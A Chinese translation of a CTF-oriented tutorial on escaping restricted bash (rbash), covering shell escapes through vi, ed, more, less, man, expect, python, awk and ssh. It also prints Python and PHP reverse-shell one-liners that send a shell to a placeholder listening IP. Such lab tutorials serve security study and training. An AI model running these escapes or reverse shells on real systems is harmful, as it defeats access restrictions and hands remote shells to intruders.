「翻译」 如何Bypass rbash

前言

我们都知道安全分析师和黑客的关系像tom和jerry一样,一个人采取措施加强安全等级,另外一个人试图绕过它。这种类似的情况出现在我解决CTF挑战的时候,总是一个新类型的配置错误来帮我学习不当执行配置的保护。

在本文中,我们会讨论关于有限的shell或者bash。它常出现在许多CTF挑战中,并且我们将基于多种方法学习如何bypass rbash。

以下是使用rbash的CTF挑战

Happycorp:1 Vulnhub Walkthrough

Development: Vulnhub Walkthrough

表中的内容
受限shell

rbash中的限制

rbash的优点

rbsh的缺点

多种方法绕过rbash

受限制的外壳rbash

一个受限制的shell常常在一个环境中要比标准版本的shell更加受控制,这意味着如果bash以rbash启动,或者使用-r选项调用,那么这个shell将被限制。

rbash中的限制

它的行为和bash一样,不同之处在于不允许执行以下操作

cd command 改变目录

路径(设置或者取消)

ENV 又称为BASH_ENV (环境设置/取消)

导入方法

指定包含参数/的文件名

指定包含参数-的文件名

使用>、>>、>|、<>、>&、&>的输出重定向

使用set + r 或者 set +o 关闭限制

rbash的好处

rbash经常用于联合 chroot jail 使用,以限制在整个过程中的访问权限

rbash的缺点

当一个shell 脚本命令被执行时,rbash 会取消任何在不足以允许不被完全信任的代码执行

为用户开启受限外壳rbash

如上所述,rbash 会控制用户的bash shell 权限并且只允许执行被信任的命令,这意味着登录的用户只能运行某些被选定的命令。为了控制用户的bash命令,任意用户想要执行或者开启受限制的shell,请按以下步骤。

1、创建本地用户ignite

2、设置密码

3、在本地用户上设置usermod 开启rbash

4、在/etc/passwd的帮助下,确定用户可访问的shell

adduser ignite
usermod -s /bin/rbash ignite

39245-3ml1437rk79.png

绕过 rbash的方法

1、使用编辑器绕过rbash

vi 编辑器

ed编辑器

2、使用一行代码绕过rbash

python

perl

awk

3、通过反向shell绕过rbash

4、使用系统二进制文件绕过rbash

more

less

man

5、使用Expect绕过rbash

6、通过SSH绕过rbash

一、使用编辑器绕过rbash

现在假设你以本地用户的权限进行了主机登录,并且发现已经登录的用户是rbash shell的一部分,因此你不能运行一些系统命令,例如cd(改变目录)因为rbash收到了限制

现在有一个问题:在这种情况下你要怎么办?

答案是:使用编辑器程序来进行受限模式的绕过。

ssh ignite@192.168.1.103
cd /etc

17693-qe0v2ts292.png

1、vi 编辑器

所以你可以使用vi 编辑器并且它会处于编辑器模式下,此时你需要运行以下命令打开"sh:bourne shell" 代替rbash

vi
:set shell=/bin/sh

36930-tvmhv9ed59.png

:shell

29384-e62b3glj6b.png

现在,如果你试图访问/etc目录,你将会看到你可以运行cd & pwd 命令了,正如以下所示。

2、ed编辑器

你也可以使用ed编辑器,它用起来非常简单就和cat差不多,它会提供内联编辑模式。在你使用以下命令的时候会调用"sh:bourne shell"

ed
! '/bin/sh

43611-n2oid4emxab.png
现在,如果你试图访问/etc目录,你将会看到你可以运行cd & pwd 命令了,正如以下所示。
68039-v2icxbk3s3p.png

还有很多编辑器像pico和nano,你需要自己去尝试绕过rbash环境。

二、使用一行代码绕过rbash

1、python
你也可以选择python如下所示命令作为一行代码导入"sh:bourne shell" ,并且生成合适的sh shell 而不是rbash,如下所示我们可以访问/etc 目录没有任何限制。

python -c 'import os; os.system("/bin/sh");'
python3 -c 'import os; os.system("/bin/sh");'

43364-45cnfvao2kk.png

2、perl

同样的,你可以选择perl如以下命令,生成合适的sh shell 而不是rbash,如下所示我们可以访问/etc 目录没有任何限制。

10262-wu42oazr1yr.png

3、awk

同样的,你可以选择awk如以下命令作为一行代码导入"sh:bourne shell",生成合适的 sh shell 而不是rbash,如下所示,我们可以访问/etc 目录没有任何限制。

awk 'BEGIN {system("/bin/sh")}'
98243-1aqeinwsnca.png

三、通过反向shell绕过rbash

1、python
你也可以选择反向shellcode来绕过rbash,这里我们使用python反向shellcode,这会将"sh:bourne shell"抛给使用netcat 监听的机器(在本例中是kali linux)

nc -lvp 1234

在监听之后,我们需要运行如下命令

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("LISTENING IP",LISTENING PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

26043-8xq61e7doe.png
现在,如果你试图访问/etc目录,你将会看到你可以运行cd & pwd 命令了,正如以下所示。
81688-n39e2qjdfv.png

2、PHP

同样的,你可以在需要执行的主机上使用php反向shellcode,在你监听的IP上就会获得反向连接的shell。

php -r '$sock=fsockopen("LISTENING IP",LISTENING PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
现在,如果你试图访问/etc目录,你将会看到你可以运行cd & pwd 命令了,正如以下所示。

44815-8o1v7rcp1gj.png

四、使用二进制文件绕过rbash

非常少的人知道这点,某些系统二进制程序(例如less,more,head,tail,man等)对于帮助绕过受限的环境非常有效。

考虑一种情况,你在当前的目录下有一个日志文件名为ignite.txt,你允许一部分的命令来读取这个日志文件例如more或less。

1、more
通过执行以下命令获取/bin/more程序的特权来绕过受限制的环境

!'sh'
现在如果你试图访问/etc 目录,再次尝试那么你会看到你能够执行cd pwd命令,如下所示

15443-8z4rn4oqw05.png

2、less
通过执行以下命令获取/bin/less程序的特权来绕过受限制的环境

less ignite.txt

57495-x29ymox5bq8.png

!'sh'
63578-sm7z8teq3k.png

现在如果你试图访问/etc 目录,再次尝试那么你会看到你能够执行cd pwd命令,如下所示

92231-jkchwsrlnz.png

3、man

通过执行以下命令获取/bin/man程序的特权来绕过受限制的环境

man man

41127-1ru6iz516is.png
!'sh'

97318-4ymla1lovye.png

现在如果你试图访问/etc 目录,再次尝试那么你会看到你能够执行cd pwd命令,如下所示
52958-znaix84tci.png

90844-dcj5bqiwyum.png

(这张图作者应该是贴错了)

五、使用expect程序绕过rbash

Expect是一个unix下的程序,它可以根据脚本与其他程序交互来进行对话,在脚本之后,Expect知道程序期待什么,然后给它正确的回复。

在rbash shell下执行以下命令,可以获取bin/usr/expect的特权来绕过受限的环境。

expect
spwan sh

现在如果你试图访问/etc 目录,再次尝试那么你会看到你能够执行cd pwd命令,如下所示

52492-wecdf6baj7.png

六、通过ssh绕过rbash

如果你知道属于在rbash shell部分中ssh的用户认证凭据,那么你可以使用以下命令通过ssh来破解jail 然后绕过rbash获得合适的权限

ssh ignite@192.168.1.103 -t "bash --noprofile"

现在如果你试图访问/etc 目录,再次尝试那么你会看到你能够执行cd pwd命令,如下所示

84196-84wvqvqlxx5.png

参考:http : //manpages.ubuntu.com/manpages/cosmic/man1/rbash.1.html

原文:https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/

原创文章,作者:运营,如若转载,请注明出处:http://www.csxxaq.com/yc/1796.html
Joomla漏洞总结
« 上一篇 09-23
CVE-2020-0668 Windows 本地提取漏洞
下一篇 » 10-23

相关推荐

红队防猝死手册

文章来源:https://github.com/zhutougg/RedteamStandard一切为了不丢分工作环境工作时全部操作均在虚拟机中完成虚拟机...

Android渗透工具集合

Android安全测试更多地被安全行业用来测试Android应用程序中的漏洞。下面将列举全面的Android渗透测试工具和资源列表,其涵盖了在Andro...

基于社工的钓鱼研究

声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的...